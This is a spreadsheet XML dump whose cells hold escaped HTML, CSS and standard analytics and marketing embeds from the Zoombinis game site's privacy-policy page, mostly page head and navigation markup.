body{--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--duotone--dark-grayscale: url('#wp-duotone-dark-grayscale');--wp--preset--duotone--grayscale: url('#wp-duotone-grayscale');--wp--preset--duotone--purple-yellow: url('#wp-duotone-purple-yellow');--wp--preset--duotone--blue-red: url('#wp-duotone-blue-red');--wp--preset--duotone--midnight: url('#wp-duotone-midnight');--wp--preset--duotone--magenta-yellow: url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green: url('#wp-duotone-purple-green');--wp--preset--duotone--blue-orange: url('#wp-duotone-blue-orange');--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;}:where(.is-layout-flex){gap: 0.5em;}body .is-layout-flow &gt; .alignleft{float: left;margin-inline-start: 0;margin-inline-end:</t>
  </si>
  <si>
    <t>important;}body .is-layout-constrained &gt; .alignwide{max-width: var(--wp--style--global--wide-size);}body .is-layout-flex{display: flex;}body .is-layout-flex{flex-wrap: wrap;align-items: center;}body .is-layout-flex &gt; *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) ! important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !</t>
  </si>
  <si>
    <t>important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) ! important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) ! important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
&lt;/style&gt;
&lt;link rel='stylesheet' id='share-this-share-buttons-sticky-css' href='https://www.terc.edu/zoombinis/wp-content/plugins/sharethis-share-buttons/css/mu-style.css?ver=1681313068' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wpcp-slick-css' href='https://www.terc.edu/zoombinis/wp-content/plugins/wp-carousel-pro/public/css/slick.min.css?ver=3.1.4' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wpcp-bx-slider-css-css' href='https://www.terc.edu/zoombinis/wp-content/plugins/wp-carousel-pro/public/css/jquery.bxslider.min.css?ver=3.1.4' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wp-carousel-pro-fontawesome-css' href='https://www.terc.edu/zoombinis/wp-content/plugins/wp-carousel-pro/public/css/font-awesome.min.css?ver=3.1.4' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wpcp-magnific-popup-css' href='https://www.terc.edu/zoombinis/wp-content/plugins/wp-carousel-pro/public/css/magnific-popup.min.css?ver=3.1.4' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wp-carousel-pro-css' href='https://www.terc.edu/zoombinis/wp-content/plugins/wp-carousel-pro/public/css/wp-carousel-pro-public.min.css?ver=3.1.4' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wp-pagenavi-css' href='https://www.terc.edu/zoombinis/wp-content/plugins/wp-pagenavi/pagenavi-css.css?ver=2.70' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='search-filter-plugin-styles-css' href='https://www.terc.edu/zoombinis/wp-content/plugins/search-filter-pro/public/assets/css/search-filter.min.css?ver=2.5.14' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='tercwptheme-style-css' href='https://www.terc.edu/zoombinis/wp-content/themes/tercwptheme/style.css?ver=6.1.1' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='child-style-css' href='https://www.terc.edu/zoombinis/wp-content/themes/tercwptheme-child/style.css?ver=1.0.0' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='forget-about-shortcode-buttons-css' href='https://www.terc.edu/zoombinis/wp-content/plugins/forget-about-shortcode-buttons/public/css/button-styles.css?ver=2.1.3' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='SP_WPCP-google-web-fonts-sp_wpcp_shortcode_options-css' href='//fonts.googleapis.com/css?family=Open+Sans%3A600%7COpen+Sans%3A600%7COpen+Sans%3A400n%7COpen+Sans%3A600%7COpen+Sans%3A400%7COpen+Sans%3A600%7COpen+Sans%3A400%7COpen+Sans%3A600%7COpen+Sans%3A400%7COpen+Sans%3A400%7COpen+Sans%3A700%7COpen+Sans%3A600' type='text/css' media='all' /&gt;
&lt;script type='text/javascript' src='//platform-api.sharethis.com/js/sharethis.js?ver=2.1.6#property=63727cffed9b4700195a7221&amp;#038;product=-buttons&amp;#038;source=sharethis-share-buttons-wordpress' id='share-this-share-buttons-mu-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.terc.edu/zoombinis/wp-includes/js/jquery/jquery.min.js?ver=3.6.1' id='jquery-core-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.terc.edu/zoombinis/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.terc.edu/zoombinis/wp-content/plugins/wonderplugin-gallery/engine/wonderplugingallery.js?ver=14.1C' id='wonderplugin-gallery-script-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' id='search-filter-plugin-build-js-extra'&gt;
/* &lt;!</t>
  </si>
  <si>
    <t>[CDATA[ */
var SF_LDATA = {"ajax_url":"https:\/\/www.terc.edu\/zoombinis\/wp-admin\/admin-ajax.php","home_url":"https:\/\/www.terc.edu\/zoombinis\/","extensions":[]};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.terc.edu/zoombinis/wp-content/plugins/search-filter-pro/public/assets/js/search-filter-build.min.js?ver=2.5.14' id='search-filter-plugin-build-js'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://www.terc.edu/zoombinis/wp-content/plugins/search-filter-pro/public/assets/js/chosen.jquery.min.js?ver=2.5.14' id='search-filter-plugin-chosen-js'&gt;&lt;/script&gt;
&lt;link rel="https://api.w.org/" href="https://www.terc.edu/zoombinis/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://www.terc.edu/zoombinis/wp-json/wp/v2/pages/399" /&gt;&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.terc.edu/zoombinis/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.terc.edu/zoombinis/wp-includes/wlwmanifest.xml" /&gt;
&lt;meta name="generator" content="WordPress 6.1.1" /&gt;
&lt;link rel="canonical" href="https://www.terc.edu/zoombinis/support/privacy-policy/" /&gt;
&lt;link rel='shortlink' href='https://www.terc.edu/zoombinis/?p=399' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://www.terc.edu/zoombinis/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.terc.edu%2Fzoombinis%2Fsupport%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://www.terc.edu/zoombinis/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.terc.edu%2Fzoombinis%2Fsupport%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
		&lt;!-- GA Google Analytics @ https://m0n.co/ga</t>
  </si>
  <si>
    <t xml:space="preserve">--&gt;
		&lt;script async src="https://www.googletagmanager.com/gtag/js?id=G-Z63Y3NT4LC"&gt;&lt;/script&gt;
		&lt;script&gt;
			window.dataLayer = window.dataLayer || [];
			function gtag(){dataLayer.push(arguments);}
			gtag('js', new Date());
			gtag('config', 'G-Z63Y3NT4LC');
		</t>
  </si>
  <si>
    <t>&lt;/script&gt;
	&lt;style type="text/css"&gt;.recentcomments a{display:inline !important;padding:0 ! important;margin:0 ! important;}&lt;/style&gt;			&lt;!--</t>
  </si>
  <si>
    <t>Easy Columns 2.1.1 by Pat Friedl http://www.patrickfriedl.com --&gt;_x005F_x000D_
			&lt;link rel="stylesheet" href="https://www.terc.edu/zoombinis/wp-content/plugins/easy-columns/css/easy-columns.css" type="text/css" media="screen, projection" /&gt;_x005F_x000D_
&lt;style&gt;
		.fasc-button { background: #4c87f7 !important;}
	.wp-block-button__link { background-color:  #4c87f7 !important; color:#fff !important; }
	&lt;/style&gt;&lt;style&gt;
		.fasc-button:hover { background: #4c87f7 !important;}
	.wp-block-button__link:hover { background-color:  #4c87f7 !important; color:#fff !important; }
	&lt;/style&gt;&lt;style&gt;
 &lt;/style&gt; 
&lt;!-- Begin Constant Contact Active Forms --&gt;
&lt;script&gt; var _ctct_m = "15ba13cbcaa39e3b19fb95c8211cc775"; &lt;/script&gt;
&lt;script id="signupScript" src="//static.ctctcdn.com/js/signup-form-widget/current/signup-form-widget.min.js" async defer&gt;&lt;/script&gt;
&lt;!-- End Constant Contact Active Forms --&gt;
&lt;script&gt;
    //</t>
  </si>
  <si>
    <t>if (document.cookie.match(/^(.*;)?\s*pum-1319\s*=\s*[^;]+(.*)?$/)) {
	jQuery(document).ready(function() {
	    if (document.cookie.match(/^(.*;)?\s*pum-\s*=\s*[^;]+(.*)?$/)) {
			jQuery('.downloadable-content').each(function() {
				jQuery(this).addClass('find');
				var thislink = jQuery(this).find('a')[0];
				var thisdatalink = jQuery(thislink).attr('data-link');
				jQuery(thislink).attr('href',thisdatalink);
			})
		}
	});
&lt;/script&gt;
&lt;script src="https://cdn.jsdelivr.net/npm/js-cookie@beta/dist/js.cookie.min.js"&gt;&lt;/script&gt;
&lt;script&gt;
	jQuery(document).ready(function() {
		jQuery('.downloadable-content').each(function() {
			var thislink = jQuery(this).find('a')[0];
			var thisdatalink = jQuery(thislink).attr('data-link');
			var thisCookie</t>
  </si>
  <si>
    <t>Facebook Pixel Code --&gt;
	&lt;script&gt;
	  ! function(f,b,e,v,n,t,s)
	  {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
	   n.callMethod.apply(n,arguments):n.queue.push(arguments)};
	  if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
	  n.queue=[];t=b.createElement(e);t.async=!0;
	  t.src=v;s=b.getElementsByTagName(e)[0];
	  s.parentNode.insertBefore(t,s)}(window, document,'script',
	  'https://connect.facebook.net/en_US/fbevents.js');
	  fbq('init', '1045068459006235');
	  fbq('track', 'PageView');
	&lt;/script&gt;
	&lt;noscript&gt;&lt;img height="1" width="1" style="display:none"
	  src="https://www.facebook.com/tr?id=1045068459006235&amp;ev=PageView&amp;noscript=1"
	/&gt;&lt;/noscript&gt;
	&lt;!--</t>
  </si>
  <si>
    <t>End Facebook Pixel Code --&gt;
	&lt;!-- Start of HubSpot Embed Code --&gt;
	&lt;script type="text/javascript" id="hs-script-loader" async defer src="//js.hs-scripts.com/7198293.js"&gt;&lt;/script&gt;
	&lt;!-- End of HubSpot Embed Code --&gt;
	&lt;style&gt;
		.navbar</t>
  </si>
  <si>
    <t>{
		   		   background-color: #4c87f7;
		   		   	       border-bottom: 4px solid #f3eb0e;
	   	   	   }
	   	   .navbar #mainnavigation &gt; ul &gt; li.active::after, 
	   .navbar</t>
  </si>
  <si>
    <t>#mainnavigation &gt; ul &gt; li.current-menu-item::after, 
	   .navbar #mainnavigation &gt; ul &gt; li:hover::after {
		    border-bottom: 6px</t>
  </si>
  <si>
    <t>solid #f3eb0e;
		}
		   #main a,
	   #main #sidebar li.current-menu-item &gt; a, 
	   #main #sidebar li.current_page_item &gt; a,
	   #main #sidebar ul.children .current_page_item &gt; a,
	   .accordion .card .card-header .btn-link,
	   #main #sidebar .sub-menu li.current-menu-item a, 
	   #main #sidebar .sub-menu li.current_page_item a,
	   a {
 		    	       color: #4c87f7;
 	   	   	   }
	   #main a:hover,
	   #main #sidebar li.current-menu-item &gt; a:hover, 
	   #main #sidebar li.current_page_item &gt;</t>
  </si>
  <si>
    <t>a:hover,
	   #main #sidebar ul.children .current_page_item &gt; a:hover,
	   .accordion .card .card-header .btn-link:hover,
	   #main #sidebar .sub-menu li.current-menu-item a:hover, 
	   #main #sidebar .sub-menu li.current_page_item a:hover,
	   a:hover {
 		    	       color: #4c87f7;
 	   	   	   }
	   .accordion .card .card-header .btn-link[aria-expanded=true] {
 		    	       background: #4c87f7;
		   color:#fff;
	   }
	   .accordion .card .card-header .btn-link[aria-expanded=true]:hover {
 		    	       background: #4c87f7;
		   color:#fff;
	   }
	   footer {
 		    	       background: #4c87f7;
 	   	   		 }
	  		.is-style-highlight,
		.is-style-highlight-purple {
			color:#4c87f7 !important;
		}
	  	&lt;/style&gt;
&lt;/head&gt;
&lt;body data-rsssl=1 class="page-template-default page page-id-399 page-child parent-pageid-100"&gt;
&lt;div class="fixed-header"&gt;
&lt;header class="container-fluid clearfix py-3"&gt;
	 &lt;div class="container"&gt;
		 &lt;div class="row position-relative"&gt;
 				&lt;a href="https://www.terc.edu/zoombinis" class="col-12 text-center text-lg-left col-lg-6 pb-4 pb-lg-0"&gt;&lt;img src="https://www.terc.edu/zoombinis/wp-content/uploads/sites/16/2021/01/01-ZoombinesHomePageLogo-v2.png" class="site-logo " alt="Zoombinis"/&gt;
		 		&lt;/a&gt;
		 &lt;nav class="secondary_menu col-12 col-lg-6 text-center text-lg-right"&gt;
			 	   		&lt;ul class="pl-0"&gt;
					 &lt;li class="nav-item d-inline-block"&gt;
						&lt;a class="search-icon nav-link d-inline-block" target="" href="#"&gt;Search&lt;/a&gt;
					 &lt;/li&gt;
					 &lt;li class="nav-item d-inline-block"&gt;
						&lt;a class="blog-icon nav-link d-inline-block" target="" href="https://www.terc.edu/zoombinis/blog/"&gt;Blog&lt;/a&gt;
					 &lt;/li&gt;
					 &lt;li class="nav-item d-inline-block"&gt;
						&lt;a class="contact-icon nav-link d-inline-block" target="" href="https://www.terc.edu/zoombinis/contact-us/"&gt;Contact Us&lt;/a&gt;
					 &lt;/li&gt;
				    	 	&lt;/ul&gt;
		 &lt;/nav&gt;
      &lt;/div&gt;
  &lt;/div&gt;
&lt;/header&gt;
 &lt;nav id="main-nav" class="container-fluid navbar navbar-expand-lg pl-lg-3"&gt;
      &lt;button class="navbar-toggler w-100 text-center" type="button" data-toggle="collapse" data-target="#mainnavigation" aria-controls="mainnavigation" aria-expanded="false" aria-label="Toggle navigation"&gt;&lt;i class="fas fa-bars"&gt;&lt;/i&gt; MENU&lt;/button&gt;
      &lt;div class="container"&gt;
	  &lt;div id="mainnavigation" class="collapse navbar-collapse row"&gt;&lt;ul id="menu-primary-menu" class="list-inline text-center text-lg-left mb-0 col-12</t>
  </si>
  <si>
    <t xml:space="preserve">navbar-nav pl-lg-3"&gt;&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-102" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-102 nav-item list-inline-item"&gt;&lt;a title="About" href="https://www.terc.edu/zoombinis/about/" class="nav-link"&gt;About&lt;/a&gt;&lt;/li&gt;
&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-103" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-103 nav-item list-inline-item"&gt;&lt;a title="Education" href="https://www.terc.edu/zoombinis/education/" class="nav-link"&gt;Education&lt;/a&gt;&lt;/li&gt;
&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-229" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children dropdown menu-item-229 nav-item list-inline-item"&gt;&lt;a title="Extras" href="https://www.terc.edu/zoombinis/extras/" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="dropdown-toggle nav-link" id="menu-item-dropdown-229"&gt;Extras&lt;/a&gt;
&lt;ul class="dropdown-menu" aria-labelledby="menu-item-dropdown-229" role="menu"&gt;
	&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-104" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-104 nav-item list-inline-item"&gt;&lt;a title="Backgrounds" href="https://www.terc.edu/zoombinis/extras/backgrounds/" class="dropdown-item"&gt;Backgrounds&lt;/a&gt;&lt;/li&gt;
	&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-174" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-174 nav-item list-inline-item"&gt;&lt;a title="Places &amp;#038; Challenges Guide" href="https://www.terc.edu/zoombinis/extras/places-challenges-guide/" class="dropdown-item"&gt;Places &amp;#038; Challenges Guide&lt;/a&gt;&lt;/li&gt;
	&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-215" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-215 nav-item list-inline-item"&gt;&lt;a title="Audio" href="https://www.terc.edu/zoombinis/extras/audio/" class="dropdown-item"&gt;Audio&lt;/a&gt;&lt;/li&gt;
	&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-239" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-239 nav-item list-inline-item"&gt;&lt;a title="Video" href="https://www.terc.edu/zoombinis/extras/video/" class="dropdown-item"&gt;Video&lt;/a&gt;&lt;/li&gt;
	&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-265" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-265 nav-item list-inline-item"&gt;&lt;a title="Tips" href="https://www.terc.edu/zoombinis/extras/tips/" class="dropdown-item"&gt;Tips&lt;/a&gt;&lt;/li&gt;
	&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-272" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-272 nav-item list-inline-item"&gt;&lt;a title="Fan Content" href="https://www.terc.edu/zoombinis/extras/fan-content/" class="dropdown-item"&gt;Fan Content&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
 &lt;/li&gt;
&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-105" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children dropdown menu-item-105 nav-item list-inline-item"&gt;&lt;a title="Honor Roll" href="https://www.terc.edu/zoombinis/honor-roll/" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="dropdown-toggle nav-link" id="menu-item-dropdown-105"&gt;Honor Roll&lt;/a&gt;
&lt;ul class="dropdown-menu" aria-labelledby="menu-item-dropdown-105" role="menu"&gt;
	&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-292" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-292 nav-item list-inline-item"&gt;&lt;a title="Credits" href="https://www.terc.edu/zoombinis/honor-roll/credits/" class="dropdown-item"&gt;Credits&lt;/a&gt;&lt;/li&gt;
	&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-297" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-297 nav-item list-inline-item"&gt;&lt;a title="Kickstarter Backers" href="https://www.terc.edu/zoombinis/honor-roll/kickstarter-backers/" class="dropdown-item"&gt;Kickstarter Backers&lt;/a&gt;&lt;/li&gt;
	&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-313" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-313 nav-item list-inline-item"&gt;&lt;a title="Hall of Fame" href="https://www.terc.edu/zoombinis/honor-roll/hall-of-fame/" class="dropdown-item"&gt;Hall of Fame&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-106" class="menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor current-menu-ancestor current-menu-parent current-page-parent current_page_parent current_page_ancestor menu-item-has-children dropdown active menu-item-106 nav-item list-inline-item"&gt;&lt;a title="Support" href="https://www.terc.edu/zoombinis/support/" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false" class="dropdown-toggle nav-link" id="menu-item-dropdown-106"&gt;Support&lt;/a&gt;
&lt;ul class="dropdown-menu" aria-labelledby="menu-item-dropdown-106" role="menu"&gt;
	&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-344" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-344 nav-item list-inline-item"&gt;&lt;a title="Android" href="https://www.terc.edu/zoombinis/support/android/" class="dropdown-item"&gt;Android&lt;/a&gt;&lt;/li&gt;
	&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-345" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-345 nav-item list-inline-item"&gt;&lt;a title="iPad" href="https://www.terc.edu/zoombinis/support/ipad/" class="dropdown-item"&gt;iPad&lt;/a&gt;&lt;/li&gt;
	&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-346" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-346 nav-item list-inline-item"&gt;&lt;a title="Kindle" href="https://www.terc.edu/zoombinis/support/kindle/" class="dropdown-item"&gt;Kindle&lt;/a&gt;&lt;/li&gt;
	&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-347" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-347 nav-item list-inline-item"&gt;&lt;a title="Mac" href="https://www.terc.edu/zoombinis/support/mac/" class="dropdown-item"&gt;Mac&lt;/a&gt;&lt;/li&gt;
	&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-348" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-348 nav-item list-inline-item"&gt;&lt;a title="Windows" href="https://www.terc.edu/zoombinis/support/windows/" class="dropdown-item"&gt;Windows&lt;/a&gt;&lt;/li&gt;
	&lt;li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-403" class="menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-399 current_page_item active menu-item-403 nav-item list-inline-item"&gt;&lt;a title="Privacy Policy" href="https://www.terc.edu/zoombinis/support/privacy-policy/" class="dropdown-item"&gt;Privacy Policy&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;	&lt;/div&gt;
&lt;/nav&gt;
&lt;/div&gt;
&lt;div class="container-fluid main-wrapper px-0"&gt;
					&lt;div id="banner" class="container-fluid pb-5 mb-3"&gt;
									&lt;div class="banner-background" style="background:url(https://www.terc.edu/zoombinis/wp-content/uploads/sites/16/2021/01/Support-Header-Image-Fleens.jpg) no-repeat center center;background-size:cover;"&gt;&lt;/div&gt;
								&lt;div class="container"&gt;
					&lt;div class="row pb-5"&gt;
						&lt;div class="col-12 py-2 page-title"&gt;
							&lt;h1&gt;Privacy Policy&lt;/h1&gt;
							&lt;div class="page-title-background"&gt;&lt;/div&gt;
						&lt;/div&gt;
					&lt;/div&gt;
				&lt;/div&gt;
			&lt;/div&gt;
		&lt;div id="main" class="container margin-top-100"&gt;
&lt;div class="row"&gt;
&lt;div id="sidebar" class="col-12 col-lg-3"&gt;	
	       &lt;div id="sidebarmenu" class="sidenbarmenu-container"&gt;&lt;ul id="menu-sidebar-menu" class="sidebarmenu-class"&gt;&lt;li id="menu-item-107" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-107"&gt;&lt;a href="https://www.terc.edu/zoombinis/about/"&gt;About&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-108" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-108"&gt;&lt;a href="https://www.terc.edu/zoombinis/education/"&gt;Education&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-230" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-230"&gt;&lt;a href="https://www.terc.edu/zoombinis/extras/"&gt;Extras&lt;/a&gt;
&lt;ul class="sub-menu"&gt;
	&lt;li id="menu-item-109" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-109"&gt;&lt;a href="https://www.terc.edu/zoombinis/extras/backgrounds/"&gt;Backgrounds&lt;/a&gt;&lt;/li&gt;
	&lt;li id="menu-item-175" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-175"&gt;&lt;a href="https://www.terc.edu/zoombinis/extras/places-challenges-guide/"&gt;Places &amp;#038; Challenges Guide&lt;/a&gt;&lt;/li&gt;
	&lt;li id="menu-item-214" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-214"&gt;&lt;a href="https://www.terc.edu/zoombinis/extras/audio/"&gt;Audio&lt;/a&gt;&lt;/li&gt;
	&lt;li id="menu-item-240" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-240"&gt;&lt;a href="https://www.terc.edu/zoombinis/extras/video/"&gt;Video&lt;/a&gt;&lt;/li&gt;
	&lt;li id="menu-item-264" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-264"&gt;&lt;a href="https://www.terc.edu/zoombinis/extras/tips/"&gt;Tips&lt;/a&gt;&lt;/li&gt;
	&lt;li id="menu-item-274" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-274"&gt;&lt;a href="https://www.terc.edu/zoombinis/extras/fan-content/"&gt;Fan Content&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
 &lt;/li&gt;
&lt;li id="menu-item-110" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-110"&gt;&lt;a href="https://www.terc.edu/zoombinis/honor-roll/"&gt;Honor Roll&lt;/a&gt;
&lt;ul class="sub-menu"&gt;
	&lt;li id="menu-item-291" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-291"&gt;&lt;a href="https://www.terc.edu/zoombinis/honor-roll/credits/"&gt;Credits&lt;/a&gt;&lt;/li&gt;
	&lt;li id="menu-item-298" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-298"&gt;&lt;a href="https://www.terc.edu/zoombinis/honor-roll/kickstarter-backers/"&gt;Kickstarter Backers&lt;/a&gt;&lt;/li&gt;
	&lt;li id="menu-item-312" class="menu-item menu-item-type-post_type menu-item-object-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</si>
</sst>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sl'%20:%20'http://www')%20+%20'.google-analytics.com/ga.js';&#xA;		//%20NOTE:%20keep%20the%20%5b1%5d%20if%20you%20replace%20this%20code.%20Otherwise%20cookie%20banner%20scripts%20won't%20be%20first%20on%20the%20page&#xA;		var%20s%20=%20document.getElementsByTagName('script')%5b1%5d;%20s.parentNode.insertBefore(ga,%20s);&#xA;	%7d)();&#xA;&#xA;	_W.Analytics%20=%20_W.Analytics%20||%20%7b'trackers':%20%7b%7d%7d;&#xA;	_W.Analytics.trackers.wGA%20=%20'_gaq';&#xA;%3c/script%3e&#xA;&#xA;%3cscript%20type=%22text/javascript%22%20async=1%3e&#xA;	//%20NOTE:%20keep%20the%20getElementsByTagName(o)**%5b1%5d**%20if%20you%20replace%20this%20code." TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 